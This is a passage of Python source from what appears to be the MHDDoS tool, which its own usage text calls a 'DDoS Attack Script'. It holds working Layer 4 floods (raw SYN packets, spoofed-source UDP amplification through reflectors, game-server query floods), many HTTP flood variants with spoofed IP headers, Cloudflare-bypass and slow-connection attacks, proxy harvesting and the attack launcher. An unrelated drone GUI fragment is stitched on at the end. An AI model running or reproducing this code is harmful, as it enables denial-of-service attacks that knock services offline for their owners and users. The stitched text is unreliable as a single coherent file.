continue
Tools.safe_close(s)
def AMP(self) -> None:
payload = next(self._amp_payloads)
s = None
with suppress(Exception), socket(AF_INET, SOCK_RAW,
IPPROTO_UDP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while Tools.sendto(s, *payload):
continue
Tools.safe_close(s)
def MCBOT(self) -> None:
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
Tools.send(s, Minecraft.handshake_forwarded(self._target,
47,
2,
ProxyTools.Random.rand_ipv4(),
uuid4()))
Tools.send(s, Minecraft.login(f"MHDDoS_{ProxyTools.Random.rand_str(5)}"))
sleep(1.5)
c = 360
while Tools.send(s, Minecraft.keepalive(ProxyTools.Random.rand_int(1111111, 9999999))):
c -= 1
if c:
continue
c = 360
Tools.send(s, Minecraft.chat(Tools.randchr(100)))
Tools.safe_close(s)
def VSE(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = (b'\xff\xff\xff\xff\x54\x53\x6f\x75\x72\x63\x65\x20\x45\x6e\x67\x69\x6e\x65'
b'\x20\x51\x75\x65\x72\x79\x00')
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def FIVEM(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = b'\xff\xff\xff\xffgetinfo xxx\x00\x00\x00'
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def TS3(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = b'\x05\xca\x7f\x16\x9c\x11\xf9\x89\x00\x00\x00\x00\x02'
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def MCPE(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = (b'\x61\x74\x6f\x6d\x20\x64\x61\x74\x61\x20\x6f\x6e\x74\x6f\x70\x20\x6d\x79\x20\x6f'
b'\x77\x6e\x20\x61\x73\x73\x20\x61\x6d\x70\x2f\x74\x72\x69\x70\x68\x65\x6e\x74\x20'
b'\x69\x73\x20\x6d\x79\x20\x64\x69\x63\x6b\x20\x61\x6e\x64\x20\x62\x61\x6c\x6c'
b'\x73')
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def _genrate_syn(self) -> bytes:
ip: IP = IP()
ip.set_ip_src(getMyIPAddress())
ip.set_ip_dst(self._target[0])
tcp: TCP = TCP()
tcp.set_SYN()
tcp.set_th_dport(self._target[1])
tcp.set_th_sport(ProxyTools.Random.rand_int(1, 65535))
ip.contains(tcp)
return ip.get_packet()
def _generate_amp(self):
payloads = []
for ref in self._ref:
ip: IP = IP()
ip.set_ip_src(self._target[0])
ip.set_ip_dst(ref)
ud: UDP = UDP()
ud.set_uh_dport(self._amp_payload[1])
ud.set_uh_sport(self._target[1])
ud.contains(Data(self._amp_payload[0]))
ip.contains(ud)
payloads.append((ip.get_packet(), (ref, self._amp_payload[1])))
return payloads
# noinspection PyBroadException,PyUnusedLocal
class HttpFlood(Thread):
_proxies: List[Proxy] = None
_payload: str
_defaultpayload: Any
_req_type: str
_useragents: List[str]
_referers: List[str]
_target: URL
_method: str
_rpc: int
_synevent: Any
SENT_FLOOD: Any
def __init__(self,
thread_id: int,
target: URL,
host: str,
method: str = "GET",
rpc: int = 1,
synevent: Event = None,
useragents: Set[str] = None,
referers: Set[str] = None,
proxies: Set[Proxy] = None) -> None:
Thread.__init__(self, daemon=True)
self.SENT_FLOOD = None
self._thread_id = thread_id
self._synevent = synevent
self._rpc = rpc
self._method = method
self._target = target
self._host = host
self._raw_target = (self._host, (self._target.port or 80))
if not self._target.host[len(self._target.host) - 1].isdigit():
self._raw_target = (self._host, (self._target.port or 80))
if not referers:
referers: List[str] = [
"https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=",
",https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer"
"/sharer.php?u=",
",https://drive.google.com/viewerng/viewer?url=",
",https://www.google.com/translate?u="
]
self._referers = list(referers)
if proxies:
self._proxies = list(proxies)
if not useragents:
useragents: List[str] = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'
]
self._useragents = list(useragents)
self._req_type = self.getMethodType(method)
self._defaultpayload = "%s %s HTTP/%s\r\n" % (self._req_type,
target.raw_path_qs, randchoice(['1.0', '1.1', '1.2']))
self._payload = (self._defaultpayload +
'Accept-Encoding: gzip, deflate, br\r\n'
'Accept-Language: en-US,en;q=0.9\r\n'
'Cache-Control: max-age=0\r\n'
'Connection: Keep-Alive\r\n'
'Sec-Fetch-Dest: document\r\n'
'Sec-Fetch-Mode: navigate\r\n'
'Sec-Fetch-Site: none\r\n'
'Sec-Fetch-User: ?1\r\n'
'Sec-Gpc: 1\r\n'
'Pragma: no-cache\r\n'
'Upgrade-Insecure-Requests: 1\r\n')
def run(self) -> None:
if self._synevent: self._synevent.wait()
self.select(self._method)
while self._synevent.is_set():
self.SENT_FLOOD()
@property
def SpoofIP(self) -> str:
spoof: str = ProxyTools.Random.rand_ipv4()
return ("X-Forwarded-Proto: Http\r\n"
f"X-Forwarded-Host: {self._target.raw_host}, 1.1.1.1\r\n"
f"Via: {spoof}\r\n"
f"Client-IP: {spoof}\r\n"
f'X-Forwarded-For: {spoof}\r\n'
f'Real-IP: {spoof}\r\n')
def generate_payload(self, other: str = None) -> bytes:
return str.encode((self._payload +
"Host: %s\r\n" % self._target.authority +
self.randHeadercontent +
(other if other else "") +
"\r\n"))
def open_connection(self) -> socket:
if self._proxies:
sock = randchoice(self._proxies).open_socket(AF_INET, SOCK_STREAM)
else:
sock = socket(AF_INET, SOCK_STREAM)
sock.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
sock.settimeout(60)
sock.connect(self._raw_target)
if self._target.scheme.lower() == "https":
sock = ctx.wrap_socket(sock,
server_hostname=self._target.host,
server_side=False,
do_handshake_on_connect=True,
suppress_ragged_eofs=True)
return sock
@property
def randHeadercontent(self) -> str:
return (f"User-Agent: {randchoice(self._useragents)}\r\n"
f"Referrer: {randchoice(self._referers)}{parse.quote(self._target.human_repr())}\r\n" +
self.SpoofIP)
@staticmethod
def getMethodType(method: str) -> str:
return "GET" if {method.upper()} & {"CFB", "CFBUAM", "GET", "COOKIE", "OVH", "EVEN",
"DYN", "SLOW", "PPS", "APACHE",
"BOT", } \
else "POST" if {method.upper()} & {"POST", "XMLRPC", "STRESS"} \
else "HEAD" if {method.upper()} & {"GSB", "HEAD"} \
else "REQUESTS"
def POST(self) -> None:
payload: bytes = self.generate_payload(
("Content-Length: 44\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/json\r\n\r\n"
'{"data": %s}') % ProxyTools.Random.rand_str(32))[:-2]
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def STRESS(self) -> None:
payload: bytes = self.generate_payload(
(f"Content-Length: 524\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/json\r\n\r\n"
'{"data": %s}') % ProxyTools.Random.rand_str(512))[:-2]
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def COOKIES(self) -> None:
payload: bytes = self.generate_payload(
"Cookie: _ga=GA%s;"
" _gat=1;"
" __cfduid=dc232334gwdsd23434542342342342475611928;"
" %s=%s\r\n" %
(ProxyTools.Random.rand_int(1000, 99999), ProxyTools.Random.rand_str(6),
ProxyTools.Random.rand_str(32)))
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def APACHE(self) -> None:
payload: bytes = self.generate_payload(
"Range: bytes=0-,%s" % ",".join("5-%d" % i
for i in range(1, 1024)))
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def XMLRPC(self) -> None:
payload: bytes = self.generate_payload(
("Content-Length: 345\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/xml\r\n\r\n"
"<?xml version='1.0' encoding='iso-8859-1'?>"
"<methodCall><methodName>pingback.ping</methodName>"
"<params><param><value><string>%s</string></value>"
"</param><param><value><string>%s</string>"
"</value></param></params></methodCall>") %
(ProxyTools.Random.rand_str(64),
ProxyTools.Random.rand_str(64)))[:-2]
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def PPS(self) -> None:
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, self._defaultpayload)
Tools.safe_close(s)
def GET(self) -> None:
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def BOT(self) -> None:
payload: bytes = self.generate_payload()
p1, p2 = str.encode(
"GET /robots.txt HTTP/1.1\r\n"
"Host: %s\r\n" % self._target.raw_authority +
"Connection: Keep-Alive\r\n"
"Accept: text/plain,text/html,*/*\r\n"
"User-Agent: %s\r\n" % randchoice(google_agents) +
"Accept-Encoding: gzip,deflate,br\r\n\r\n"), str.encode(
"GET /sitemap.xml HTTP/1.1\r\n"
"Host: %s\r\n" % self._target.raw_authority +
"Connection: Keep-Alive\r\n"
"Accept: */*\r\n"
"From: googlebot(at)googlebot.com\r\n"
"User-Agent: %s\r\n" % randchoice(google_agents) +
"Accept-Encoding: gzip,deflate,br\r\n"
"If-None-Match: %s-%s\r\n" % (ProxyTools.Random.rand_str(9),
ProxyTools.Random.rand_str(4)) +
"If-Modified-Since: Sun, 26 Set 2099 06:00:00 GMT\r\n\r\n")
s = None
with suppress(Exception), self.open_connection() as s:
Tools.send(s, p1)
Tools.send(s, p2)
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def EVEN(self) -> None:
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
while Tools.send(s, payload) and s.recv(1):
continue
Tools.safe_close(s)
def OVH(self) -> None:
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(min(self._rpc, 5)):
Tools.send(s, payload)
Tools.safe_close(s)
def CFB(self):
global REQUESTS_SENT, BYTES_SEND
pro = None
if self._proxies:
pro = randchoice(self._proxies)
s = None
with suppress(Exception), create_scraper() as s:
for _ in range(self._rpc):
if pro:
with s.get(self._target.human_repr(),
proxies=pro.asRequest()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
Tools.safe_close(s)
def CFBUAM(self):
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
Tools.send(s, payload)
sleep(5.01)
ts = time()
for _ in range(self._rpc):
Tools.send(s, payload)
if time() > ts + 120: break
Tools.safe_close(s)
def AVB(self):
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
sleep(max(self._rpc / 1000, 1))
Tools.send(s, payload)
Tools.safe_close(s)
def DGB(self):
global REQUESTS_SENT, BYTES_SEND
s = None
with suppress(Exception), Session() as s:
with s.post(self._target.human_repr()) as ss:
ss.raise_for_status()
for key, value in ss.cookies.items():
s.cookies.set_cookie(cookies.create_cookie(key, value))
for _ in range(min(self._rpc, 5)):
sleep(min(self._rpc, 5) / 100)
if self._proxies:
pro = randchoice(self._proxies)
with s.get(self._target.human_repr(),
proxies=pro.asRequest()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
Tools.safe_close(s)
def DYN(self):
payload: Any = str.encode(self._payload +
"Host: %s.%s\r\n" % (ProxyTools.Random.rand_str(6), self._target.authority) +
self.randHeadercontent +
"\r\n")
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def DOWNLOADER(self):
payload: Any = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
while 1:
sleep(.01)
data = s.recv(1)
if not data:
break
Tools.send(s, b'0')
Tools.safe_close(s)
def BYPASS(self):
global REQUESTS_SENT, BYTES_SEND
pro = None
if self._proxies:
pro = randchoice(self._proxies)
s = None
with suppress(Exception), Session() as s:
for _ in range(self._rpc):
if pro:
with s.get(self._target.human_repr(),
proxies=pro.asRequest()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
Tools.safe_close(s)
def GSB(self):
payload = str.encode("%s %s?qs=%s HTTP/1.1\r\n" % (self._req_type,
self._target.raw_path_qs,
ProxyTools.Random.rand_str(6)) +
"Host: %s\r\n" % self._target.authority +
self.randHeadercontent +
'Accept-Encoding: gzip, deflate, br\r\n'
'Accept-Language: en-US,en;q=0.9\r\n'
'Cache-Control: max-age=0\r\n'
'Connection: Keep-Alive\r\n'
'Sec-Fetch-Dest: document\r\n'
'Sec-Fetch-Mode: navigate\r\n'
'Sec-Fetch-Site: none\r\n'
'Sec-Fetch-User: ?1\r\n'
'Sec-Gpc: 1\r\n'
'Pragma: no-cache\r\n'
'Upgrade-Insecure-Requests: 1\r\n\r\n')
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def NULL(self) -> None:
payload: Any = str.encode(self._payload +
"Host: %s\r\n" % self._target.authority +
"User-Agent: null\r\n" +
"Referrer: null\r\n" +
self.SpoofIP + "\r\n")
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def BOMB(self):
assert self._proxies, \
'This method requires proxies. ' \
'Without proxies you can use github.com/codesenberg/bombardier'
while True:
proxy = randchoice(self._proxies)
if proxy.type != ProxyType.SOCKS4:
break
res = run(
[
f'{bombardier_path}',
f'--connections={self._rpc}',
'--http2',
'--method=GET',
'--latencies',
'--timeout=30s',
f'--requests={self._rpc}',
f'--proxy={proxy}',
f'{self._target.human_repr()}',
],
stdout=PIPE,
)
if self._thread_id == 0:
print(proxy, res.stdout.decode(), sep='\n')
def SLOW(self):
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
while Tools.send(s, payload) and s.recv(1):
for i in range(self._rpc):
keep = str.encode("X-a: %d\r\n" % ProxyTools.Random.rand_int(1, 5000))
Tools.send(s, keep)
sleep(self._rpc / 15)
break
Tools.safe_close(s)
def select(self, name: str) -> None:
self.SENT_FLOOD = self.GET
if name == "POST":
self.SENT_FLOOD = self.POST
if name == "CFB":
self.SENT_FLOOD = self.CFB
if name == "CFBUAM":
self.SENT_FLOOD = self.CFBUAM
if name == "XMLRPC":
self.SENT_FLOOD = self.XMLRPC
if name == "BOT":
self.SENT_FLOOD = self.BOT
if name == "APACHE":
self.SENT_FLOOD = self.APACHE
if name == "BYPASS":
self.SENT_FLOOD = self.BYPASS
if name == "DGB":
self.SENT_FLOOD = self.DGB
if name == "OVH":
self.SENT_FLOOD = self.OVH
if name == "AVB":
self.SENT_FLOOD = self.AVB
if name == "STRESS":
self.SENT_FLOOD = self.STRESS
if name == "DYN":
self.SENT_FLOOD = self.DYN
if name == "SLOW":
self.SENT_FLOOD = self.SLOW
if name == "GSB":
self.SENT_FLOOD = self.GSB
if name == "NULL":
self.SENT_FLOOD = self.NULL
if name == "COOKIE":
self.SENT_FLOOD = self.COOKIES
if name == "PPS":
self.SENT_FLOOD = self.PPS
self._defaultpayload = (
self._defaultpayload +
"Host: %s\r\n\r\n" % self._target.authority).encode()
if name == "EVEN": self.SENT_FLOOD = self.EVEN
if name == "DOWNLOADER": self.SENT_FLOOD = self.DOWNLOADER
if name == "BOMB": self.SENT_FLOOD = self.BOMB
class ProxyManager:
@staticmethod
def DownloadFromConfig(cf, Proxy_type: int) -> Set[Proxy]:
providrs = [
provider for provider in cf["proxy-providers"]
if provider["type"] == Proxy_type or Proxy_type == 0
]
logger.info("Downloading Proxies form %d Providers" % len(providrs))
proxes: Set[Proxy] = set()
with ThreadPoolExecutor(len(providrs)) as executor:
future_to_download = {
executor.submit(
ProxyManager.download, provider,
ProxyType.stringToProxyType(str(provider["type"])))
for provider in providrs
}
for future in as_completed(future_to_download):
for pro in future.result():
proxes.add(pro)
return proxes
@staticmethod
def download(provider, proxy_type: ProxyType) -> Set[Proxy]:
logger.debug(
"Downloading Proxies form (URL: %s, Type: %s, Timeout: %d)" %
(provider["url"], proxy_type.name, provider["timeout"]))
proxes: Set[Proxy] = set()
with suppress(TimeoutError, exceptions.ConnectionError,
exceptions.ReadTimeout):
data = get(provider["url"], timeout=provider["timeout"]).text
try:
for proxy in ProxyUtiles.parseAllIPPort(
data.splitlines(), proxy_type):
proxes.add(proxy)
except Exception as e:
logger.error(f'Download Proxy Error: {(e.__str__() or e.__repr__())}')
return proxes
class ToolsConsole:
METHODS = {"INFO", "TSSRV", "CFIP", "DNS", "PING", "CHECK", "DSTAT"}
@staticmethod
def checkRawSocket():
with suppress(OSError):
with socket(AF_INET, SOCK_RAW, IPPROTO_TCP):
return True
return False
@staticmethod
def runConsole():
cons = f"{gethostname()}@MHTools:~#"
while 1:
cmd = input(cons + " ").strip()
if not cmd: continue
if " " in cmd:
cmd, args = cmd.split(" ", 1)
cmd = cmd.upper()
if cmd == "HELP":
print("Tools:" + ", ".join(ToolsConsole.METHODS))
print("Commands: HELP, CLEAR, BACK, EXIT")
continue
if (cmd == "E") or \
(cmd == "EXIT") or \
(cmd == "Q") or \
(cmd == "QUIT") or \
(cmd == "LOGOUT") or \
(cmd == "CLOSE"):
exit(-1)
if cmd == "CLEAR":
print("\033c")
continue
if not {cmd} & ToolsConsole.METHODS:
print(f"{cmd} command not found")
continue
if cmd == "DSTAT":
with suppress(KeyboardInterrupt):
ld = net_io_counters(pernic=False)
while True:
sleep(1)
od = ld
ld = net_io_counters(pernic=False)
t = [(last - now) for now, last in zip(od, ld)]
logger.info(
("Bytes Sended %s\n"
"Bytes Recived %s\n"
"Packets Sended %s\n"
"Packets Recived %s\n"
"ErrIn %s\n"
"ErrOut %s\n"
"DropIn %s\n"
"DropOut %s\n"
"Cpu Usage %s\n"
"Memory %s\n") %
(Tools.humanbytes(t[0]), Tools.humanbytes(t[1]),
Tools.humanformat(t[2]), Tools.humanformat(t[3]),
t[4], t[5], t[6], t[7], str(cpu_percent()) + "%",
str(virtual_memory().percent) + "%"))
if cmd in ["CFIP", "DNS"]:
print("Soon")
continue
if cmd == "CHECK":
while True:
with suppress(Exception):
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
if "/" not in domain: continue
logger.info("please wait ...")
with get(domain, timeout=20) as r:
logger.info(('status_code: %d\n'
'status: %s') %
(r.status_code, "ONLINE"
if r.status_code <= 500 else "OFFLINE"))
if cmd == "INFO":
while True:
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://',
'').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
print('please wait ...', end="\r")
info = ToolsConsole.info(domain)
if not info["success"]:
print("Error!")
continue
logger.info(("Country: %s\n"
"City: %s\n"
"Org: %s\n"
"Isp: %s\n"
"Region: %s\n") %
(info["country"], info["city"], info["org"],
info["isp"], info["region"]))
if cmd == "TSSRV":
while True:
domain = input(f'{cons}give-me-domain# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://',
'').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
print('please wait ...', end="\r")
info = ToolsConsole.ts_srv(domain)
logger.info(f"TCP: {(info['_tsdns._tcp.'])}\n")
logger.info(f"UDP: {(info['_ts3._udp.'])}\n")
if cmd == "PING":
while True:
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://',
'').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
logger.info("please wait ...")
r = ping(domain, count=5, interval=0.2)
logger.info(('Address: %s\n'
'Ping: %d\n'
'Aceepted Packets: %d/%d\n'
'status: %s\n') %
(r.address, r.avg_rtt, r.packets_received,
r.packets_sent,
"ONLINE" if r.is_alive else "OFFLINE"))
@staticmethod
def stop():
print('All Attacks has been Stopped !')
for proc in process_iter():
if proc.name() == "python.exe":
proc.kill()
@staticmethod
def usage():
print((
'* MHDDoS - DDoS Attack Script With %d Methods\n'
'Note: If the Proxy list is empty, the attack will run without proxies\n'
' If the Proxy file doesn\'t exist, the script will download proxies and check them.\n'
' Proxy Type 0 = All in config.json\n'
' SocksTypes:\n'
' - 6 = RANDOM\n'
' - 5 = SOCKS5\n'
' - 4 = SOCKS4\n'
' - 1 = HTTP\n'
' - 0 = ALL\n'
' > Methods:\n'
' - Layer4\n'
' | %s | %d Methods\n'
' - Layer7\n'
' | %s | %d Methods\n'
' - Tools\n'
' | %s | %d Methods\n'
' - Others\n'
' | %s | %d Methods\n'
' - All %d Methods\n'
'\n'
'Example:\n'
' L7: python3 %s <method> <url> <socks_type> <threads> <proxylist> <rpc> <duration> <debug=optional>\n'
' L4: python3 %s <method> <ip:port> <threads> <duration>\n'
' L4 Proxied: python3 %s <method> <ip:port> <threads> <duration> <socks_type> <proxylist>\n'
' L4 Amplification: python3 %s <method> <ip:port> <threads> <duration> <reflector file (only use with'
' Amplification)>\n') %
(len(Methods.ALL_METHODS) + 3 + len(ToolsConsole.METHODS),
", ".join(Methods.LAYER4_METHODS), len(Methods.LAYER4_METHODS),
", ".join(Methods.LAYER7_METHODS), len(Methods.LAYER7_METHODS),
", ".join(ToolsConsole.METHODS), len(ToolsConsole.METHODS),
", ".join(["TOOLS", "HELP", "STOP"]), 3,
len(Methods.ALL_METHODS) + 3 + len(ToolsConsole.METHODS),
argv[0], argv[0], argv[0], argv[0]))
# noinspection PyBroadException
@staticmethod
def ts_srv(domain):
records = ['_ts3._udp.', '_tsdns._tcp.']
DnsResolver = resolver.Resolver()
DnsResolver.timeout = 1
DnsResolver.lifetime = 1
Info = {}
for rec in records:
try:
srv_records = resolver.resolve(rec + domain, 'SRV')
for srv in srv_records:
Info[rec] = str(srv.target).rstrip('.') + ':' + str(
srv.port)
except:
Info[rec] = 'Not found'
return Info
# noinspection PyUnreachableCode
@staticmethod
def info(domain):
with suppress(Exception), get("https://ipwhois.app/json/%s/" % domain) as s:
return s.json()
return {"success": False}
def handleProxyList(con, proxy_li, proxy_ty, url=None):
if proxy_ty not in {4, 5, 1, 0, 6}:
exit("Socks Type Not Found [4, 5, 1, 0, 6]")
if proxy_ty == 6:
proxy_ty = randchoice([4, 5, 1])
if not proxy_li.exists():
logger.warning("The file doesn't exist, creating files and downloading proxies.")
proxy_li.parent.mkdir(parents=True, exist_ok=True)
with proxy_li.open("w") as wr:
Proxies: Set[Proxy] = ProxyManager.DownloadFromConfig(con, proxy_ty)
logger.info(
f"{len(Proxies):,} Proxies are getting checked, this may take awhile!"
)
Proxies = ProxyChecker.checkAll(
Proxies, timeout=1, threads=threads,
url=url.human_repr() if url else "http://httpbin.org/get",
)
if not Proxies:
exit(
"Proxy Check failed, Your network may be the problem"
" | The target may not be available."
)
stringBuilder = ""
for proxy in Proxies:
stringBuilder += (proxy.__str__() + "\n")
wr.write(stringBuilder)
proxies = ProxyUtiles.readFromFile(proxy_li)
if proxies:
logger.info(f"Proxy Count: {len(proxies):,}")
else:
logger.info(
"Empty Proxy File, running flood witout proxy")
proxies = None
return proxies
if __name__ == '__main__':
with open(__dir__ / "config.json") as f:
con = load(f)
with suppress(KeyboardInterrupt):
with suppress(IndexError):
one = argv[1].upper()
if one == "HELP":
raise IndexError()
if one == "TOOLS":
ToolsConsole.runConsole()
if one == "STOP":
ToolsConsole.stop()
method = one
host = None
url = None
event = Event()
event.clear()
target = None
urlraw = argv[2].strip()
if not urlraw.startswith("http"):
urlraw = "http://" + urlraw
if method not in Methods.ALL_METHODS:
exit("Method Not Found %s" %
", ".join(Methods.ALL_METHODS))
if method in Methods.LAYER7_METHODS:
url = URL(urlraw)
host = url.host
try:
host = gethostbyname(url.host)
except Exception as e:
exit('Cannot resolve hostname ', url.host, e)
threads = int(argv[4])
rpc = int(argv[6])
timer = int(argv[7])
proxy_ty = int(argv[3].strip())
proxy_li = Path(__dir__ / "files/proxies/" /
argv[5].strip())
useragent_li = Path(__dir__ / "files/useragent.txt")
referers_li = Path(__dir__ / "files/referers.txt")
bombardier_path = Path.home() / "go/bin/bombardier"
proxies: Any = set()
if method == "BOMB":
assert (
bombardier_path.exists()
or bombardier_path.with_suffix('.exe').exists()
), (
"Install bombardier: "
"https://github.com/MHProDev/MHDDoS/wiki/BOMB-method"
)
if len(argv) == 9:
logger.setLevel("DEBUG")
if not useragent_li.exists():
exit("The Useragent file doesn't exist ")
if not referers_li.exists():
exit("The Referer file doesn't exist ")
uagents = set(a.strip()
for a in useragent_li.open("r+").readlines())
referers = set(a.strip()
for a in referers_li.open("r+").readlines())
if not uagents: exit("Empty Useragent File ")
if not referers: exit("Empty Referer File ")
if threads > 1000:
logger.warning("Thread is higher than 1000")
if rpc > 100:
logger.warning(
"RPC (Request Pre Connection) is higher than 100")
proxies = handleProxyList(con, proxy_li, proxy_ty, url)
for thread_id in range(threads):
HttpFlood(thread_id, url, host, method, rpc, event,
uagents, referers, proxies).start()
if method in Methods.LAYER4_METHODS:
target = URL(urlraw)
port = target.port
target = target.host
try:
target = gethostbyname(target)
except Exception as e:
exit('Cannot resolve hostname ', url.host, e)
if port > 65535 or port < 1:
exit("Invalid Port [Min: 1 / Max: 65535] ")
if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "CLDAP", "ARD", "SYN"} and \
not ToolsConsole.checkRawSocket():
exit("Cannot Create Raw Socket")
threads = int(argv[3])
timer = int(argv[4])
proxies = None
ref = None
if not port:
logger.warning("Port Not Selected, Set To Default: 80")
port = 80
if len(argv) >= 6:
argfive = argv[5].strip()
if argfive:
refl_li = Path(__dir__ / "files" / argfive)
if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "CLDAP", "ARD"}:
if not refl_li.exists():
exit("The reflector file doesn't exist")
if len(argv) == 7:
logger.setLevel("DEBUG")
ref = set(a.strip()
for a in ProxyTools.Patterns.IP.findall(
refl_li.open("r+").read()))
if not ref: exit("Empty Reflector File ")
elif argfive.isdigit() and len(argv) >= 7:
if len(argv) == 8:
logger.setLevel("DEBUG")
proxy_ty = int(argfive)
proxy_li = Path(__dir__ / "files/proxies" / argv[6].strip())
proxies = handleProxyList(con, proxy_li, proxy_ty)
if method not in {"MINECRAFT", "MCBOT", "TCP", "CPS", "CONNECTION"}:
exit("this method cannot use for layer4 proxy")
else:
logger.setLevel("DEBUG")
for _ in range(threads):
Layer4((target, port), ref, method, event,
proxies).start()
logger.info(
"Attack Started to %s with %s method for %s seconds, threads: %d!"
% (target or url.human_repr(), method, timer, threads))
event.set()
ts = time()
while time() < ts + timer:
logger.debug('PPS: %s, BPS: %s / %d%%' %
(Tools.humanformat(int(REQUESTS_SENT)),
Tools.humanbytes(int(BYTES_SEND)),
round((time() - ts) / timer * 100, 2)))
REQUESTS_SENT.set(0)
BYTES_SEND.set(0)
sleep(1)
event.clear()
exit()
ToolsConsole.usage()
|
app.py
|
import cv2
import datetime
import numpy as np
import os
import threading
import time
import torch
from djitellopy import tello
from moviepy.editor import *
from tkinter import *
from PIL import Image, ImageTk # You have to import this last or else Image.open throws an error
from commands import start_flying, stop_flying
from model.train import get_transform
class GUI():
def __init__(self, HEIGHT, WIDTH):
self.HEIGHT = HEIGHT
self.WIDTH = WIDTH
self.root = Tk()
